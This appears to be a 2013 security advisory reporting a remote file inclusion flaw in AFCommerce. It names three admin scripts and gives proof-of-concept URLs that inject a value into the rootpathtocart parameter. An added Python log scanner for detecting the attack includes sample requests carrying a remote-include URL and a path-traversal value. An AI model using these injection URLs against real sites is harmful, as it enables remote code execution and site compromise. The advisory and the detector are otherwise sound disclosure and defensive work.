AFCommerce Remote File Inclusion

Published : 2013.12.26
Credit : NoGe
Risk : High
CWE : CWE-22
CVE : N/A
Local : No
Remote : Yes


[o] AFCommerce a.k.a Amazing Flash Commerce <= Remote File Inclusion Vulnerability

Software : AFCommerce Professional Edition
Version : n/a
Vendor : http://www.afcommerce.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : AFCommerce is a full and complete online store with both a store front and administration area directly out of the box, which can be easily installed, configured, and maintained over a web-based interface. AFCommerce now includes our Ecommerce Website Building Software integrated with our free shopping cart. This allows you to create an unlimited number of custom web pages and customize the fonts and colors of all your pages, as well as the structural layout of your website.


=============================================================================================================

[o] Vuln

adblock.php
adminpassword.php
controlheader.php

include_once ($rootpathtocart . "/admin/customadminfooter.php");
include_once ($rootpathtocart . "/mods/adminfiles/adminpassword.php");
include_once ($rootpathtocart . "/mods/adminfiles/controlheader.php");

=============================================================================================================


[o] Poc

http://localhost/afcontrol/adblock.php?rootpathtocart=[RFI]
http://localhost/afcontrol/adminpassword.php?rootpathtocart=[RFI]
http://localhost/afcontrol/controlheader.php?rootpathtocart=[RFI]
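As an added defensive example (not part of the advisory), the following Python scans web-server access logs for requests to the three affected scripts that supply rootpathtocart from the client at all, since a legitimate request never carries that parameter, and classifies each hit as a remote-URL (RFI) or path-traversal attempt. The script names and parameter come from the advisory; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts the advisory lists as building an include path from $rootpathtocart.
VULNERABLE_SCRIPTS = {"adblock.php", "adminpassword.php", "controlheader.php"}
PARAM = "rootpathtocart"

# Combined/common log format: ip ident user [time] "METHOD target PROTO" status ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Dec/2013:10:00:01 +0900] "GET /afcontrol/adblock.php?rootpathtocart=http://198.51.100.9/x HTTP/1.1" 200 512',
    '203.0.113.7 - - [25/Dec/2013:10:00:02 +0900] "GET /afcontrol/controlheader.php?rootpathtocart=..%2F..%2F..%2Fetc HTTP/1.1" 200 300',
    '198.51.100.2 - - [25/Dec/2013:10:00:03 +0900] "GET /afcontrol/index.php?page=1 HTTP/1.1" 200 1200',
    '198.51.100.2 - - [25/Dec/2013:10:00:04 +0900] "GET /afcontrol/adminpassword.php HTTP/1.1" 200 800',
]

def classify_value(value: str) -> str:
    """Classify one client-supplied rootpathtocart value."""
    v = unquote(value).strip()  # second decode also catches double-encoded values
    # A URL scheme or PHP stream wrapper (http:, ftp:, php:, data:) means a remote include.
    if re.match(r'^[a-zA-Z][a-zA-Z0-9+.-]*:', v):
        return "rfi"
    # ../ segments or an absolute path point the include at an arbitrary local file.
    if ".." in v.replace("\\", "/").split("/") or v.startswith("/"):
        return "traversal"
    # Any other value is still suspicious: the parameter is never meant to come from the client.
    return "supplied"

def scan_log(lines):
    """Return (ip, script, value, kind) for every request abusing the parameter."""
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        script = parts.path.rsplit("/", 1)[-1]
        if script not in VULNERABLE_SCRIPTS:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            findings.append((m["ip"], script, value, classify_value(value)))
    return findings

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```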


=============================================================================================================


[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================


[o] December 25 2013 - Papua, Indonesia || Merry Christmas!! Lord Jesus bless... :)


Copyright 2017, cxsecurity.com